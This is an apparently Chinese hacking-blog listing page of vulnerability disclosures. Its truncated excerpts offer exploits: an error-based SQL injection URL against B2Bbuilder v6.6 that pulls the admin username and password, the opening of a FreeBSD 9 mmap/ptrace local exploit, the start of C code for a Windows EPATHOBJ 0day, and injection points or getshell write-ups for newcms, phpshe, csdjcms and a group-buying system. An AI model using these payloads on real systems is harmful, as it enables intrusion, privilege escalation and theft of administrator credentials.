• B2Bbuilder注入漏洞+Exp+默认管理员帐号

    B2Bbuilder注入漏洞+Exp+默认管理员帐号
    博主测试的程序版本为:B2Bbuilder_v6.6 注入点点:http://www.unhonker.com/?m=offer&s=offer_list&id=1004 Exp: http://www.unhonker.com/?m=offer&s=offer_list&id=1004+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+concat%280x27%2C0x7e%2Cb2bbuilder_admin.user,0x27,password%2C0x27%2C0x7e%29+from+%60b2bbuilder%60.b2bbuilder...阅读全文
    作者:unhonker | 分类:漏洞公布 | 阅读:5,294次 | 标签:
  • FreeBSD 9.{0,1} mmap/ptrace exploit

    FreeBSD 9.{0,1} mmap/ptrace exploit
    /* * FreeBSD 9.{0,1} mmap/ptrace exploit * by Hunger <fbsd9lul () hunger hu> * * Happy Birthday FreeBSD! * Now you are 20 years old and your security is the same as 20 years ago... 🙂 * * Greetings to #nohup, _2501, boldi, eax, johnny_b, kocka, op, pipacs, prof, * sd, sghctoma, snq, spender, s2crew and others at #hekkcamp: * I hope we'll meet again at 8 ...阅读全文
    作者:unhonker | 分类:漏洞公布 | 阅读:4,439次 | 标签:
  • newcms_v2.2-sql注入

    newcms_v2.2-sql注入
    可以看到USERJIHUO.ASP的id没有进行任何过滤 进一步证实,而且是数字型注入,被调用的文件中也没有过滤代码,构造得到的注入点: /user/USERJIHUO.ASP?id=1 由于注入语句正确后会弹窗口,浏览器中不好直接观看,所以丢注入工具进行检测 自动添加表名:new_admin 用户字段:admin_name 密码字段:admin_pass 批量搜索关键字:powered by newcms_v2.2   Crazy3-90sec 阅读全文
    作者:unhonker | 分类:漏洞公布 | 阅读:5,423次 | 标签:
  • 迟来的6.1礼物 EPATHOBJ 0day exploit

    迟来的6.1礼物 EPATHOBJ 0day exploit
    编译方式:vc6 release.  最下面有我编译好的exp 下面为利用代码: 代码: #include #include #include #include //#include #pragma comment(lib, "gdi32") #pragma comment(lib, "kernel32") #pragma comment(lib, "user32") #define MAX_POLYPOINTS (8192 * 3) #define MAX_REGIONS 8192 #define CYCLE_TIMEOUT 10000 #pragma comment(linker, "/SE...阅读全文
    作者:unhonker | 分类:漏洞公布 | 阅读:7,440次 | 标签:
  • phpshe v1.1 多处文件包含与SQL注射漏洞

    phpshe v1.1 多处文件包含与SQL注射漏洞
    /*******************************************************/ /* Phpshe v1.1 Vulnerability /* ======================== /* By: : Kn1f3 /* E-Mail : 681796@qq.com /*******************************************************/ 0x00 整体大概参数传输 [font=Verdana, Helvetica, Arial, sans-serif][size=12px] [/size][/font] //common.php if (get_magic_quotes_gpc()) { !empty($_GE...阅读全文
    作者:unhonker | 分类:漏洞公布 | 阅读:5,813次 | 标签:
  • csdjcms V 3.0 getshell Vulnerability

    csdjcms V 3.0 getshell Vulnerability
    /*******************************************************/ /* csdjcms < V 3.0 getshell Vulnerability /* ======================== /* By: : Kn1f3 /* E-Mail : 681796@qq.com /*******************************************************/ csdjcms 一款YY黑客与YY肥猪流喜欢用的唱歌网站。。 csdjcms V 2.5 code ...阅读全文
    作者:unhonker | 分类:漏洞公布 | 阅读:3,629次 | 标签:
  • 易想团购系统通杀SQL注入漏洞分析附利用exp

    易想团购系统通杀SQL注入漏洞分析附利用exp
    作者:Seay 博客:http://www.cnseay.com/ 转载请保留以上信息。 刚打开红黑看到J8基友写的一个{易想团购系统 最新版 通杀}的文章,看他贴的代码里面有个get_client_ip()函数. 哈哈,我猜没过滤,果断下了一套程序。 找到get_client_ip()函数。 // 获取客户端IP地址 function get_client_ip(){ if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT...阅读全文
    作者:unhonker | 分类:漏洞公布 | 阅读:4,357次 | 标签: